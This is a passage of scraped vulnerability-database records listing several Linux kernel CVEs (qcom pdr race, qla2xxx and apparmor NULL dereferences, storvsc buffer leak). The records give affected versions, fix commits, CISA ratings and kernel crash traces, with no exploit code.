"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "eab05737ee22216250fe20d27f5a596da5ea6eb7",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
},
{
"lessThan": "d0870c4847e77a49c2f91bb2a8e0fa3c1f8dea5c",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
},
{
"lessThan": "475a77fb3f0e1d527f56c60b79f5879661df5b80",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
},
{
"lessThan": "3e815626d73e05152a8142f6e44aecc4133e6e08",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
},
{
"lessThan": "8543269567e2fb3d976a8255c5e348aed14f98bc",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
},
{
"lessThan": "107924c14e3ddd85119ca43c26a4ee1056fa9b84",
"status": "affected",
"version": "fbe639b44a82755d639df1c5d147c93f02ac5a0f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/soc/qcom/pdr_interface.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.7"
},
{
"lessThan": "5.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsoc: qcom: pdr: protect locator_addr with the main mutex\n\nIf the service locator server is restarted fast enough, the PDR can\nrewrite locator_addr fields concurrently. Protect them by placing\nmodification of those fields under the main pdr-\u003elock."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:39.347Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/eab05737ee22216250fe20d27f5a596da5ea6eb7"
},
{
"url": "https://git.kernel.org/stable/c/d0870c4847e77a49c2f91bb2a8e0fa3c1f8dea5c"
},
{
"url": "https://git.kernel.org/stable/c/475a77fb3f0e1d527f56c60b79f5879661df5b80"
},
{
"url": "https://git.kernel.org/stable/c/3e815626d73e05152a8142f6e44aecc4133e6e08"
},
{
"url": "https://git.kernel.org/stable/c/8543269567e2fb3d976a8255c5e348aed14f98bc"
},
{
"url": "https://git.kernel.org/stable/c/107924c14e3ddd85119ca43c26a4ee1056fa9b84"
}
],
"title": "soc: qcom: pdr: protect locator_addr with the main mutex",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43849",
"datePublished": "2024-08-17T09:22:02.728Z",
"dateReserved": "2024-08-17T09:11:59.276Z",
"dateUpdated": "2025-05-04T09:27:39.347Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42286 (GCVE-0-2024-42286)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 09:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: validate nvme_local_port correctly
The driver load failed with error message,
qla2xxx [0000:04:00.0]-ffff:0: register_localport failed: ret=ffffffef
and with a kernel crash,
BUG: unable to handle kernel NULL pointer dereference at 0000000000000070
Workqueue: events_unbound qla_register_fcport_fn [qla2xxx]
RIP: 0010:nvme_fc_register_remoteport+0x16/0x430 [nvme_fc]
RSP: 0018:ffffaaa040eb3d98 EFLAGS: 00010282
RAX: 0000000000000000 RBX: ffff9dfb46b78c00 RCX: 0000000000000000
RDX: ffff9dfb46b78da8 RSI: ffffaaa040eb3e08 RDI: 0000000000000000
RBP: ffff9dfb612a0a58 R08: ffffffffaf1d6270 R09: 3a34303a30303030
R10: 34303a303030305b R11: 2078787832616c71 R12: ffff9dfb46b78dd4
R13: ffff9dfb46b78c24 R14: ffff9dfb41525300 R15: ffff9dfb46b78da8
FS: 0000000000000000(0000) GS:ffff9dfc67c00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000070 CR3: 000000018da10004 CR4: 00000000000206f0
Call Trace:
qla_nvme_register_remote+0xeb/0x1f0 [qla2xxx]
? qla2x00_dfs_create_rport+0x231/0x270 [qla2xxx]
qla2x00_update_fcport+0x2a1/0x3c0 [qla2xxx]
qla_register_fcport_fn+0x54/0xc0 [qla2xxx]
Exit the qla_nvme_register_remote() function when qla_nvme_register_hba()
fails and correctly validate nvme_local_port.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42286",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:20.265559Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:30.367Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_nvme.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "549aac9655320c9b245a24271b204668c5d40430",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "e1f010844443c389bc552884ac5cfa47de34d54c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "a3ab508a4853a9f5ae25a7816a4889f09938f63c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "cde43031df533751b4ead37d173922feee2f550f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "7cec2c3bfe84539c415f5e16f989228eba1d2f1e",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f6be298cc1042f24d521197af29c7c4eb95af4d5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "3eac973eb5cb2b874b3918f924798afc5affd46b",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "eb1d4ce2609584eeb7694866f34d4b213caa3af9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/qla2xxx/qla_nvme.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.320",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.320",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: validate nvme_local_port correctly\n\nThe driver load failed with error message,\n\nqla2xxx [0000:04:00.0]-ffff:0: register_localport failed: ret=ffffffef\n\nand with a kernel crash,\n\n\tBUG: unable to handle kernel NULL pointer dereference at 0000000000000070\n\tWorkqueue: events_unbound qla_register_fcport_fn [qla2xxx]\n\tRIP: 0010:nvme_fc_register_remoteport+0x16/0x430 [nvme_fc]\n\tRSP: 0018:ffffaaa040eb3d98 EFLAGS: 00010282\n\tRAX: 0000000000000000 RBX: ffff9dfb46b78c00 RCX: 0000000000000000\n\tRDX: ffff9dfb46b78da8 RSI: ffffaaa040eb3e08 RDI: 0000000000000000\n\tRBP: ffff9dfb612a0a58 R08: ffffffffaf1d6270 R09: 3a34303a30303030\n\tR10: 34303a303030305b R11: 2078787832616c71 R12: ffff9dfb46b78dd4\n\tR13: ffff9dfb46b78c24 R14: ffff9dfb41525300 R15: ffff9dfb46b78da8\n\tFS: 0000000000000000(0000) GS:ffff9dfc67c00000(0000) knlGS:0000000000000000\n\tCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n\tCR2: 0000000000000070 CR3: 000000018da10004 CR4: 00000000000206f0\n\tCall Trace:\n\tqla_nvme_register_remote+0xeb/0x1f0 [qla2xxx]\n\t? qla2x00_dfs_create_rport+0x231/0x270 [qla2xxx]\n\tqla2x00_update_fcport+0x2a1/0x3c0 [qla2xxx]\n\tqla_register_fcport_fn+0x54/0xc0 [qla2xxx]\n\nExit the qla_nvme_register_remote() function when qla_nvme_register_hba()\nfails and correctly validate nvme_local_port."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:25:58.203Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/549aac9655320c9b245a24271b204668c5d40430"
},
{
"url": "https://git.kernel.org/stable/c/e1f010844443c389bc552884ac5cfa47de34d54c"
},
{
"url": "https://git.kernel.org/stable/c/a3ab508a4853a9f5ae25a7816a4889f09938f63c"
},
{
"url": "https://git.kernel.org/stable/c/cde43031df533751b4ead37d173922feee2f550f"
},
{
"url": "https://git.kernel.org/stable/c/7cec2c3bfe84539c415f5e16f989228eba1d2f1e"
},
{
"url": "https://git.kernel.org/stable/c/f6be298cc1042f24d521197af29c7c4eb95af4d5"
},
{
"url": "https://git.kernel.org/stable/c/3eac973eb5cb2b874b3918f924798afc5affd46b"
},
{
"url": "https://git.kernel.org/stable/c/eb1d4ce2609584eeb7694866f34d4b213caa3af9"
}
],
"title": "scsi: qla2xxx: validate nvme_local_port correctly",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42286",
"datePublished": "2024-08-17T09:08:52.036Z",
"dateReserved": "2024-07-30T07:40:12.262Z",
"dateUpdated": "2025-05-04T09:25:58.203Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48890 (GCVE-0-2022-48890)
Vulnerability from cvelistv5
Published
2024-08-21 06:10
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: storvsc: Fix swiotlb bounce buffer leak in confidential VM
storvsc_queuecommand() maps the scatter/gather list using scsi_dma_map(),
which in a confidential VM allocates swiotlb bounce buffers. If the I/O
submission fails in storvsc_do_io(), the I/O is typically retried by higher
level code, but the bounce buffer memory is never freed. The mostly like
cause of I/O submission failure is a full VMBus channel ring buffer, which
is not uncommon under high I/O loads. Eventually enough bounce buffer
memory leaks that the confidential VM can't do any I/O. The same problem
can arise in a non-confidential VM with kernel boot parameter
swiotlb=force.
Fix this by doing scsi_dma_unmap() in the case of an I/O submission
error, which frees the bounce buffer memory.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48890",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:04:25.311779Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:32:55.107Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/storvsc_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "87c71e88f6a6619ffb1ff88f84dff48ef6d57adb",
"status": "affected",
"version": "743b237c3a7b0f5b44aa704aae8a1058877b6322",
"versionType": "git"
},
{
"lessThan": "67ff3d0a49f3d445c3922e30a54e03c161da561e",
"status": "affected",
"version": "743b237c3a7b0f5b44aa704aae8a1058877b6322",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/storvsc_drv.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.17"
},
{
"lessThan": "5.17",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.2",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.7",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.2",
"versionStartIncluding": "5.17",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: storvsc: Fix swiotlb bounce buffer leak in confidential VM\n\nstorvsc_queuecommand() maps the scatter/gather list using scsi_dma_map(),\nwhich in a confidential VM allocates swiotlb bounce buffers. If the I/O\nsubmission fails in storvsc_do_io(), the I/O is typically retried by higher\nlevel code, but the bounce buffer memory is never freed. The mostly like\ncause of I/O submission failure is a full VMBus channel ring buffer, which\nis not uncommon under high I/O loads. Eventually enough bounce buffer\nmemory leaks that the confidential VM can\u0027t do any I/O. The same problem\ncan arise in a non-confidential VM with kernel boot parameter\nswiotlb=force.\n\nFix this by doing scsi_dma_unmap() in the case of an I/O submission\nerror, which frees the bounce buffer memory."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:34.291Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/87c71e88f6a6619ffb1ff88f84dff48ef6d57adb"
},
{
"url": "https://git.kernel.org/stable/c/67ff3d0a49f3d445c3922e30a54e03c161da561e"
}
],
"title": "scsi: storvsc: Fix swiotlb bounce buffer leak in confidential VM",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48890",
"datePublished": "2024-08-21T06:10:22.243Z",
"dateReserved": "2024-08-21T06:06:23.290Z",
"dateUpdated": "2025-05-04T08:25:34.291Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52889 (GCVE-0-2023-52889)
Vulnerability from cvelistv5
Published
2024-08-17 09:08
Modified
2025-05-04 07:45
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
apparmor: Fix null pointer deref when receiving skb during sock creation
The panic below is observed when receiving ICMP packets with secmark set
while an ICMP raw socket is being created. SK_CTX(sk)->label is updated
in apparmor_socket_post_create(), but the packet is delivered to the
socket before that, causing the null pointer dereference.
Drop the packet if label context is not set.
BUG: kernel NULL pointer dereference, address: 000000000000004c
#PF: supervisor read access in kernel mode
#PF: error_code(0x0000) - not-present page
PGD 0 P4D 0
Oops: 0000 [#1] PREEMPT SMP NOPTI
CPU: 0 PID: 407 Comm: a.out Not tainted 6.4.12-arch1-1 #1 3e6fa2753a2d75925c34ecb78e22e85a65d083df
Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/28/2020
RIP: 0010:aa_label_next_confined+0xb/0x40
Code: 00 00 48 89 ef e8 d5 25 0c 00 e9 66 ff ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 0f 1f 00 0f 1f 44 00 00 89 f0 <8b> 77 4c 39 c6 7e 1f 48 63 d0 48 8d 14 d7 eb 0b 83 c0 01 48 83 c2
RSP: 0018:ffffa92940003b08 EFLAGS: 00010246
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 000000000000000e
RDX: ffffa92940003be8 RSI: 0000000000000000 RDI: 0000000000000000
RBP: ffff8b57471e7800 R08: ffff8b574c642400 R09: 0000000000000002
R10: ffffffffbd820eeb R11: ffffffffbeb7ff00 R12: ffff8b574c642400
R13: 0000000000000001 R14: 0000000000000001 R15: 0000000000000000
FS: 00007fb092ea7640(0000) GS:ffff8b577bc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 000000000000004c CR3: 00000001020f2005 CR4: 00000000007706f0
PKRU: 55555554
Call Trace:
<IRQ>
? __die+0x23/0x70
? page_fault_oops+0x171/0x4e0
? exc_page_fault+0x7f/0x180
? asm_exc_page_fault+0x26/0x30
? aa_label_next_confined+0xb/0x40
apparmor_secmark_check+0xec/0x330
security_sock_rcv_skb+0x35/0x50
sk_filter_trim_cap+0x47/0x250
sock_queue_rcv_skb_reason+0x20/0x60
raw_rcv+0x13c/0x210
raw_local_deliver+0x1f3/0x250
ip_protocol_deliver_rcu+0x4f/0x2f0
ip_local_deliver_finish+0x76/0xa0
__netif_receive_skb_one_core+0x89/0xa0
netif_receive_skb+0x119/0x170
? __netdev_alloc_skb+0x3d/0x140
vmxnet3_rq_rx_complete+0xb23/0x1010 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]
vmxnet3_poll_rx_only+0x36/0xb0 [vmxnet3 56a84f9c97178c57a43a24ec073b45a9d6f01f3a]
__napi_poll+0x28/0x1b0
net_rx_action+0x2a4/0x380
__do_softirq+0xd1/0x2c8
__irq_exit_rcu+0xbb/0xf0
common_interrupt+0x86/0xa0
</IRQ>
<TASK>
asm_common_interrupt+0x26/0x40
RIP: 0010:apparmor_socket_post_create+0xb/0x200
Code: 08 48 85 ff 75 a1 eb b1 0f 1f 80 00 00 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 41 54 <55> 48 89 fd 53 45 85 c0 0f 84 b2 00 00 00 48 8b 1d 80 56 3f 02 48
RSP: 0018:ffffa92940ce7e50 EFLAGS: 00000286
RAX: ffffffffbc756440 RBX: 0000000000000000 RCX: 0000000000000001
RDX: 0000000000000003 RSI: 0000000000000002 RDI: ffff8b574eaab740
RBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000
R10: ffff8b57444cec70 R11: 0000000000000000 R12: 0000000000000003
R13: 0000000000000002 R14: ffff8b574eaab740 R15: ffffffffbd8e4748
? __pfx_apparmor_socket_post_create+0x10/0x10
security_socket_post_create+0x4b/0x80
__sock_create+0x176/0x1f0
__sys_socket+0x89/0x100
__x64_sys_socket+0x17/0x20
do_syscall_64+0x5d/0x90
? do_syscall_64+0x6c/0x90
? do_syscall_64+0x6c/0x90
? do_syscall_64+0x6c/0x90
entry_SYSCALL_64_after_hwframe+0x72/0xdc
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f Version: ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52889",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:11:55.468269Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:31.755Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"security/apparmor/lsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "0abe35bc48d4ec80424b1f4b3560c0e082cbd5c1",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "347dcb84a4874b5fb375092c08d8cc4069b94f81",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "290a6b88e8c19b6636ed1acc733d1458206f7697",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "ead2ad1d9f045f26fdce3ef1644913b3a6cd38f2",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "6c920754f62cefc63fccdc38a062c7c3452e2961",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "46c17ead5b7389e22e7dc9903fd0ba865d05bda2",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
},
{
"lessThan": "fce09ea314505a52f2436397608fa0a5d0934fb1",
"status": "affected",
"version": "ab9f2115081ab7ba63b77a759e0f3eb5d6463d7f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"security/apparmor/lsm.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
